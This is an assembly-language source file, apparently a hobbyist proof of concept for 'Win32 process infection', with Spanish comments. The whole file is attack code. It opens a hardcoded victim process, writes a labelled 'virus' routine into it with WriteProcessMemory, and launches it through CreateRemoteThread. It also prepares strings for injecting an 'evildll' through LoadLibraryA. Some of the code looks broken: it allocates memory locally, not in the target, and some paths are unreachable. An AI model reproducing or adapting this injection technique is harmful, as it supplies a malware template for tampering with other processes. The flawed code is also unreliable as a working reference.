;Win32 Process infection Proof of concept,  
;Sha0 BadCheckSum.com

;compilar:
;bin\tasm32 -m1 -m3 -mx shao,,;
;bin\tlink32 -Tpe -aa shao,shao,,lib\import32.lib,,

.386
.model flat, stdcall


	extrn	OpenProcess:PROC
	extrn	VirtualAlloc:PROC
	extrn	WriteProcessMemory:PROC
	extrn	CreateRemoteThread:PROC
	extrn	WaitForSingleObject:PROC
	extrn	VirtualFree:PROC
	extrn	CloseHandle:PROC
	extrn	LoadLibraryA:PROC
	extrn	GetProcAddress:PROC
	extrn	MessageBoxA:PROC
	extrn	ExitProcess:PROC

.data
	
	PAGE_EXECUTE_READWRITE	dd	40h
	MEM_COMMIT		dd	1000h
	MEM_RELEASE		dd	8000h
	MEM_DECOMIT		dd	4000h
	
	pid 		dd 	1476		;victym
	LLA		dd	0
	hProcess	dd	0
	vf		dd	0
	vd		dd	0
	vp		dd	0
	hThread		dd	0
	
	evildll		db	'c:\dev-cpp\experiments\dll\fuck.dll',0
	procc		db	'LoadLibraryA',0
	kernel		db	'Kernel32',0
	lanzando	db	'Lanzando thread',0
	lanzado		db	'Ya esta lanzado ;)',0

	bytes		dd	0

	tit		db	'ERROR',0
	errRMF		db	'Reserva memoria funcion',0
	errRMD		db	'Reserva memoria datos',0
	errEMF		db	'Escribe memoria funcion',0
	errEMD		db	'Escribe memoria parametro',0
	errNBF		db	'No bytes en funcion',0
	errNBD		db	'No bytes en data',0
	errTH		db	'Thread malo',0

.code

inicio:

abre_proceso:
	push	pid
	push	0
	push	1f0fffh
	call	OpenProcess
	mov	hProcess, eax


reservar:
	mov	ebx, 13d
	call	reserva
	mov	vd, eax

	mov	ebx, offset(fin)-offset(virus)
	call	reserva
	mov	vf, eax


escribir_funcion:
	mov	eax, offset(fin)-offset(virus)
	mov	ebx, offset(virus)
	mov	ecx, vf
	call	escribe

	mov	edx, offset(errNBF)
	mov	ebx, bytes
	test	ebx, ebx
	jz	sobad

	;jmp 	crea_thread

escribir_datos:
	mov	eax, 13d
	mov	ebx, offset(procc)
	mov	ecx, vd
	call	escribe

	mov	edx, offset(errNBD)
	mov	ebx, bytes
	test	ebx, ebx
	jz	sobad


crea_thread:
	push	0
	push	offset(tit)
	push	offset(lanzando)
	push	0
	call	MessageBoxA

	xor	ebx, ebx

	push	ebx
	push	0
	push	ebx
	push	vf
	push	vd
	push	ebx
	push	hProcess
	call	CreateRemoteThread

	push	0
	push	offset(tit)
	push	offset(lanzado)
	push	0
	call	MessageBoxA

	
	jmp	fin


	mov	hThread, eax

	mov	edx, offset(errTH)
	call	testea

	jmp 	fin			;sin deallocar ;)

espera:
	push	0	
	push	0
	push	offset(evildll)
	push	offset(evildll)
	push	0
	call	MessageBoxA

	push	hThread
	call	WaitForSingleObject

libera:
	push	hThread
	call	CloseHandle

	push	MEM_RELEASE
	push	fin-virus
	push	vf
	push	hProcess
	call	VirtualFree

	push	MEM_RELEASE
	push	kernel-procc
	push	vd
	push	hProcess
	call	VirtualFree

	push	hProcess
	call	CloseHandle
	
	jmp	fin



;;;;;;;;;;;;;;;;;;;;Virus code;;;;;;;;;;;;;;;;;;;

virus:				
	call	delta
	add	edx, offset(msg)
	mov	byte ptr [edx], 09
yo:
	jmp	yo
	retn



delta:			     ;delta offset en edx :)
	call	getDelta
getDelta:
	pop	edx
	sub	edx, offset(getDelta)
	ret


;;;;;;;;;;;;;;;;;;;;Virus data;;;;;;;;;;;;;;;;;;;;;

data:				

	msg	db	'yepa',0
	titu	db	'hehe',0

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;



fin:
	push	0
	call	ExitProcess

sobad:
	push	0
	push	offset(tit)
	push	edx
	push	0
	call	MessageBoxA
	jmp	fin

testea:
	test	eax, eax
	jz	sobad
	ret

reserva:
	push	PAGE_EXECUTE_READWRITE
	push	MEM_COMMIT
	push	ebx
	push	0
	call	VirtualAlloc
	ret

escribe:
	push	offset(bytes);
	push	eax
	push	ebx;
	push	ecx;
	push	hProcess
	call	WriteProcessMemory
	ret

	
end inicio